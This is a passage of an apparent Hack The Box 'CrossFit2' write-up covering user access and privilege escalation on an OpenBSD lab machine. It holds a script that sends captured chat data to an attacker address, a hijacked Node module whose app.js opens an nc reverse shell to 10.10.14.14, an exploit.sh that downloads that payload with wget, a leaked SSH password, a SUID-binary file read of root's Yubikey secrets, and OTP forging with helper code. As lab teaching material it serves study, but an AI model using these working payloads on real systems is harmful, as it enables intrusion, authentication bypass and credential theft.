    socket.on("private_recv", (data) => {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://10.10.14.14:8000/?x=" + JSON.stringify(data), true);
        xhr.send();
    });
</script>
</html>

user flag

The password obtained is david's SSH password; log in to get user.txt:

ssh david@10.10.10.232
NWBFcSe3ws4VDhTB

Privilege escalation information

Simple enumeration shows that david and john are both in the sysadmins group, while root and john are both in the staff group, so the path should go through john:

david to john

The default shell is csh; switch to /bin/sh and enumerate:

find / -group sysadmins -ls 2>/dev/null
1244170 4 drwxrwxr-x 3 root sysadmins 512 Feb 3 04:45 /opt/sysadmin

Inside it there is a statbot.js file:

This script is run periodically as john, as the ownership of the log it writes shows:

crossfit2$ ls -al /tmp/chatbot.log
-rw-r--r-- 1 john wheel 30982 May 12 06:39 /tmp/chatbot.log

node_modules search path hijacking

The log is written with the log-to-file module, which only exists in the global module directory:

find / -type d -name 'log-to-file' -ls 2>/dev/null
1845012 4 drwxr-xr-x 2 root wheel 512 Jan 13 10:44 /usr/local/lib/node_modules/log-to-file

According to the Node.js module documentation, require() of a bare name such as 'log-to-file' first looks for a node_modules directory in the script's own directory and then in each parent directory up to /, and only afterwards falls back to NODE_PATH and the global folders, through which the system copy under /usr/local/lib/node_modules is reached.

statbot.js lives under /opt/sysadmin, and /opt/sysadmin is group-writable by sysadmins, so a node_modules/log-to-file we create there is picked up before the system copy.

Wait for the next scheduled run and we get a shell as john:

statbot.js

const WebSocket = require('ws');
const fs = require('fs');
const logger = require('log-to-file');   // bare name: resolved through the node_modules chain
const ws = new WebSocket("ws://gym.crossfit.htb/ws/");

function log(status, connect) {
    var message;
    if(status) {
        message = `Bot is alive`;
    }
    else {
        if(connect) {
            message = `Bot is down (failed to connect)`;
        }
        else {
            message = `Bot is down (failed to receive)`;
        }
    }
    logger(message, '/tmp/chatbot.log');
}

ws.on('error', function err() {
    ws.close();
    log(false, true);
})

ws.on('message', function message(data) {
    data = JSON.parse(data);
    try {
        if(data.status === "200") {
            ws.close()
            log(true, false);
        }
    }
    catch(err) {
        ws.close()
        log(false, false);
    }
});

app.js

const { exec } = require("child_process");
const fs = require("fs");

// Spawn the reverse shell as soon as statbot.js require()s this hijacked module.
exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.14 4444 >/tmp/f", (error, stdout, stderr) => {
    if (error) {
        console.log(`error: ${error.message}`);
        return;
    }
    if (stderr) {
        console.log(`stderr: ${stderr}`);
        return;
    }
    console.log(`stdout: ${stdout}`);
});

// Keep the module's (text, file) interface so statbot.js does not crash on an
// undefined export and keeps writing its status line to /tmp/chatbot.log.
function logToFile(text, file) {
    fs.appendFileSync(file, `${text}\n`);
}

// Export.
module.exports = logToFile;

exploit.sh

#!/bin/sh
# Plant a copy of log-to-file where Node looks first, then swap in our app.js.

mkdir -p /opt/sysadmin/node_modules
cp -r /usr/local/lib/node_modules/log-to-file /opt/sysadmin/node_modules/
rm /opt/sysadmin/node_modules/log-to-file/app.js
# app.js, the module's entry point, is fetched from the attacker box
wget -q -O/opt/sysadmin/node_modules/log-to-file/app.js 10.10.14.14:7777/app.js
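The lookup order that makes this hijack work can be checked mechanically instead of by reading the docs each time. The following is an added example, not the page's exploit and not Node's own code: it reproduces the documented require() search for a bare module name (node_modules in the script's directory and every ancestor, skipping directories that are themselves named node_modules, all of which come before NODE_PATH and the global folders) and reports which of those directories a user could plant a module in ahead of the legitimate copy. The script location /opt/sysadmin/server/statbot.js is an assumption for illustration; the page only shows that statbot.js sits under /opt/sysadmin. The writability check is passed in as a function so the logic can be exercised without touching the filesystem.

```python
"""Enumerate Node.js require() lookup directories for hijack candidates (added example)."""
import os
import posixpath
from typing import Callable, List


def node_module_paths(script_path: str) -> List[str]:
    """Directories Node searches for a bare require() from script_path, in order.

    Node appends 'node_modules' to the script's directory and each ancestor up to /,
    skipping ancestors that are themselves called node_modules. NODE_PATH entries and
    the global folders are consulted only after this whole chain.
    """
    paths = []
    d = posixpath.dirname(posixpath.normpath(script_path))
    while True:
        if posixpath.basename(d) != "node_modules":
            paths.append(posixpath.join(d, "node_modules"))
        if d == "/":
            return paths
        d = posixpath.dirname(d)


def hijack_points(script_path: str, module: str, legit_dir: str,
                  can_write: Callable[[str], bool]) -> List[str]:
    """Module paths an attacker could create that shadow the legitimate copy.

    legit_dir is the node_modules directory holding the real module; chain entries
    at or after it are not candidates. can_write(dir) decides whether the attacker
    could create or modify dir/<module>.
    """
    candidates = []
    for d in node_module_paths(script_path):
        if posixpath.normpath(d) == posixpath.normpath(legit_dir):
            break
        if can_write(d):
            candidates.append(posixpath.join(d, module))
    return candidates


def fs_can_write(path: str) -> bool:
    """Real filesystem check: the directory is writable, or it is missing and its parent is."""
    if os.path.isdir(path):
        return os.access(path, os.W_OK)
    parent = os.path.dirname(path)
    return os.path.isdir(parent) and os.access(parent, os.W_OK)


if __name__ == "__main__":
    script = "/opt/sysadmin/server/statbot.js"      # assumed location of the cron'd script
    for d in node_module_paths(script):
        print("searched:", d)
    # On the box the real module sits in /usr/local/lib/node_modules, outside the chain.
    print("plantable:", hijack_points(script, "log-to-file", "/usr/local/lib/node_modules", fs_can_write))
```

Run as david it prints /opt/sysadmin/node_modules/log-to-file as plantable, which is exactly the directory exploit.sh creates.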

john to root

SUID log

find / -type f -group staff -ls 2>/dev/null
1481580 20 -rwsr-s--- 1 root staff 9024 Jan 5 13:04 /usr/local/bin/log

This log binary simply reads and prints a file; as it is setuid root and executable by the staff group, john can use it to read any file as root:

Yubikey

Earlier we saw that root's login is tied to a Yubikey:

So read root's Yubikey state files with log:

log /var/db/yubikey/root.key && log /var/db/yubikey/root.uid && log /var/db/yubikey/root.ctr && echo

6bf9a26475388ce998988b67eaa2ea87
a4ce1128bde4
985089 # 0xf0801 in hex: login_yubikey stores (session counter << 8) | use counter, so the low byte 01 is the use counter and 0f08 is the session counter we need

With the AES key, the private ID and the counters known, ykgenerate from yubico-c can produce a valid OTP. The new combined counter must be greater than the stored one, so keep the session counter 0f08 and bump the use counter from 01 to 02 (the timestamp fields c0a8 and 00 are arbitrary):

ykgenerate 6bf9a26475388ce998988b67eaa2ea87 a4ce1128bde4 0f08 c0a8 00 02
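To make the counter arithmetic concrete, here is an added example (not part of the write-up and not yubico-c code). It splits the stored counter value the way the page decodes 985089, applies the replay rule that decoding implies (the new (session counter << 8) | use must be strictly greater than the stored value), and assembles the 16-byte plaintext that ykgenerate AES-encrypts and modhex-encodes: 6-byte private ID, session counter, timestamp, use counter, random field and the inverted CRC-16, all little-endian. The AES step is deliberately left out (no crypto library is assumed), so the block does not reproduce the OTP string; it does modhex-decode the OTP the page obtained back into its 16 ciphertext bytes. The rnd value 0 is this example's default, a real token fills that field randomly.

```python
"""Yubikey OTP counter and token-format helpers (added example, not yubico-c code)."""
import struct

MODHEX = "cbdefghijklnrtuv"          # Yubico's keyboard-layout-independent hex alphabet
CRC_OK_RESIDUE = 0xF0B8              # crc16 over a valid 16-byte token yields this value


def decode_ctr_file(value: int):
    """Split the value stored in root.ctr into (session counter, session use)."""
    return value >> 8, value & 0xFF


def is_fresh(stored: int, session_ctr: int, use: int) -> bool:
    """Replay check: the combined counter must be strictly greater than the stored one.

    Bit 15 of the session counter is the caps-lock flag and does not count.
    """
    return (((session_ctr & 0x7FFF) << 8) | use) > stored


def crc16(data: bytes) -> int:
    """CRC-16 as used by Yubico (reflected polynomial 0x8408, initial value 0xFFFF)."""
    crc = 0xFFFF
    for byte in data:
        crc ^= byte
        for _ in range(8):
            lsb = crc & 1
            crc >>= 1
            if lsb:
                crc ^= 0x8408
    return crc


def build_token(uid_hex: str, session_ctr: int, tstp_low: int, tstp_high: int,
                use: int, rnd: int = 0) -> bytes:
    """Assemble the 16-byte plaintext that ykgenerate encrypts with the AES key.

    Layout: uid(6) | ctr(2 LE) | tstpl(2 LE) | tstph(1) | use(1) | rnd(2 LE) | ~crc(2 LE).
    rnd=0 is this example's default; the real device fills it randomly.
    """
    uid = bytes.fromhex(uid_hex)
    if len(uid) != 6:
        raise ValueError("private id must be 6 bytes")
    body = uid + struct.pack("<HHBBH", session_ctr, tstp_low, tstp_high, use, rnd)
    crc = (~crc16(body)) & 0xFFFF
    return body + struct.pack("<H", crc)


def crc_ok(token: bytes) -> bool:
    """A decrypted token is intact when the CRC over all 16 bytes equals the residue."""
    return len(token) == 16 and crc16(token) == CRC_OK_RESIDUE


def parse_token(token: bytes):
    """Inverse of build_token: return (uid_hex, session_ctr, tstp_low, tstp_high, use)."""
    if not crc_ok(token):
        raise ValueError("bad CRC")
    ctr, tstpl, tstph, use, _rnd = struct.unpack("<HHBBH", token[6:14])
    return token[:6].hex(), ctr, tstpl, tstph, use


def modhex_encode(data: bytes) -> str:
    return "".join(MODHEX[b >> 4] + MODHEX[b & 0xF] for b in data)


def modhex_decode(text: str) -> bytes:
    if len(text) % 2 or any(c not in MODHEX for c in text):
        raise ValueError("not modhex")
    nibbles = [MODHEX.index(c) for c in text]
    return bytes((hi << 4) | lo for hi, lo in zip(nibbles[::2], nibbles[1::2]))


if __name__ == "__main__":
    session_ctr, use = decode_ctr_file(985089)        # value read from root.ctr
    print(f"stored: ctr={session_ctr:04x} use={use:02x}")
    print("replaying use=01 accepted:", is_fresh(985089, session_ctr, 0x01))
    print("use=02 accepted:", is_fresh(985089, session_ctr, 0x02))
    tok = build_token("a4ce1128bde4", 0x0F08, 0xC0A8, 0x00, 0x02)
    print("plaintext to AES-encrypt:", tok.hex(), "crc ok:", crc_ok(tok))
    print("ciphertext of the page's OTP:", modhex_decode("cttndvdheldlhjfubluidkckfvgjvbeb").hex())
```

The replay check is why reading root.ctr matters as much as reading root.key: a freshly captured OTP from the real device would carry a counter the server has already seen, while a generated one with a higher use counter is accepted once and then raises the stored value again.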

SSH private key

/etc/changelist lists /root/.ssh/id_rsa. According to security(8), the daily security script keeps a backup of every file listed there under /var/backups, naming it after the full path with the slashes replaced by underscores and a .current suffix:

/var/backups/root_.ssh_id_rsa.current

Reading that file with log gives root's SSH private key:

/etc/changelist

#	$OpenBSD: changelist,v 1.127 2020/09/13 10:03:46 ajacoutot Exp $
#
# List of files which the security script backs up and checks
# for modifications.
#
# Files prefixed with a '+' will have their checksums stored,
# not the actual files.
#

/etc/Distfile
/etc/acme-client.conf
/etc/adduser.conf
/etc/adduser.message
/etc/bgpd.conf
/etc/boot.conf
/etc/bootparams
/etc/changelist
/etc/chio.conf
/etc/crontab
/etc/csh.cshrc
/etc/csh.login
/etc/csh.logout
/etc/daily
/etc/daily.local
/etc/defaultdomain
/etc/dhclient.conf
/etc/dhcpd.conf
/etc/disktab
/etc/distfile
/etc/doas.conf
/etc/dvmrpd.conf
/etc/eigrpd.conf
/etc/ethers
/etc/exports
/etc/fbtab
/etc/fstab
/etc/ftpchroot
/etc/ftpusers
/etc/ftpwelcome
/etc/gettytab
/etc/group
/etc/hostapd.conf
+/etc/hostname.*
/etc/hosts
/etc/hosts.lpd
/etc/httpd.conf
/etc/ifstated.conf
+/etc/iked.conf
/etc/iked/local.pub
+/etc/iked/private/local.key
/etc/inetd.conf
/etc/installurl
+/etc/ipsec.conf
+/etc/isakmpd/isakmpd.conf
+/etc/isakmpd/isakmpd.policy
/etc/isakmpd/local.pub
+/etc/isakmpd/private/local.key
/etc/ksh.kshrc
/etc/ldapd.conf
/etc/ldpd.conf
/etc/locate.rc
+/etc/login.conf
/etc/login_ldap.conf
/etc/mail.rc
/etc/mail/aliases
/etc/mail/smtpd.conf
/etc/mail/spamd.conf
/etc/mailer.conf
/etc/man.conf
/etc/master.passwd
/etc/mk.conf
+/etc/moduli
/etc/monthly
/etc/monthly.local
/etc/motd
/etc/mrouted.conf
/etc/mtree/4.4BSD.dist
/etc/mtree/BSD.x11.dist
/etc/mygate
/etc/myname
/etc/netgroup
/etc/netstart
/etc/newsyslog.conf
/etc/npppd/npppd.conf
+/etc/npppd/npppd-users
/etc/ntpd.conf
/etc/ospf6d.conf
/etc/ospfd.conf
/etc/passwd
/etc/pf.conf
/etc/pf.os
/etc/printcap
/etc/profile
/etc/protocols
+/etc/pwd.db
/etc/rad.conf
+/etc/radiusd.conf
/etc/rbootd.conf
/etc/rc
/etc/rc.conf
/etc/rc.conf.local
/etc/rc.d/rc.subr
/etc/rc.local
/etc/rc.securelevel
/etc/rc.shutdown
/etc/relayd.conf
/etc/remote
/etc/resolv.conf
/etc/resolv.conf.tail
/etc/ripd.conf
/etc/rpc
/etc/rpki/afrinic.tal
/etc/rpki/apnic.tal
/etc/rpki/arin.tal
/etc/rpki/lacnic.tal
/etc/rpki/ripe.tal
/etc/sasyncd.conf
/etc/sensorsd.conf
/etc/services
/etc/shells
+/etc/snmpd.conf
+/etc/soii.key
+/etc/spwd.db
/etc/ssh/ssh_config
+/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_dsa_key.pub
+/etc/ssh/ssh_host_ecdsa_key
/etc/ssh/ssh_host_ecdsa_key.pub
+/etc/ssh/ssh_host_ed25519_key
/etc/ssh/ssh_host_ed25519_key.pub
+/etc/ssh/ssh_host_key
/etc/ssh/ssh_host_key.pub
+/etc/ssh/ssh_host_rsa_key
/etc/ssh/ssh_host_rsa_key.pub
/etc/ssh/sshd_config
/etc/ssl/cert.pem
/etc/suid_profile
/etc/sysctl.conf
/etc/syslog.conf
/etc/switchd.conf
/etc/sysmerge.ignore
/etc/ttys
/etc/unwind.conf
/etc/usermgmt.conf
/etc/vm.conf
/etc/weekly
/etc/weekly.local
/etc/wsconsctl.conf
/etc/ypldap.conf
/root/.Xdefaults
/root/.cshrc
/root/.login
/root/.profile
/root/.rhosts
/root/.shosts
/root/.ssh/authorized_keys
/root/.ssh/authorized_keys2
/root/.ssh/id_rsa
/var/cron/at.allow
/var/cron/at.deny
/var/cron/cron.allow
/var/cron/cron.deny
/var/cron/tabs/root
/var/db/unwind.key
+/var/nsd/etc/nsd.conf
/var/unbound/etc/unbound.conf
/var/yp/Makefile.main
/var/yp/Makefile.yp
/.cshrc
/.profile

root id_rsa

-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----

root flag

Generate the Yubikey OTP, then log in as root with the recovered private key, supplying the OTP as the password, to get root.txt:

➜  yubico-c git:(master) ✗ ./ykgenerate 6bf9a26475388ce998988b67eaa2ea87 a4ce1128bde4 0f08  c0a8 00 02
cttndvdheldlhjfubluidkckfvgjvbeb

References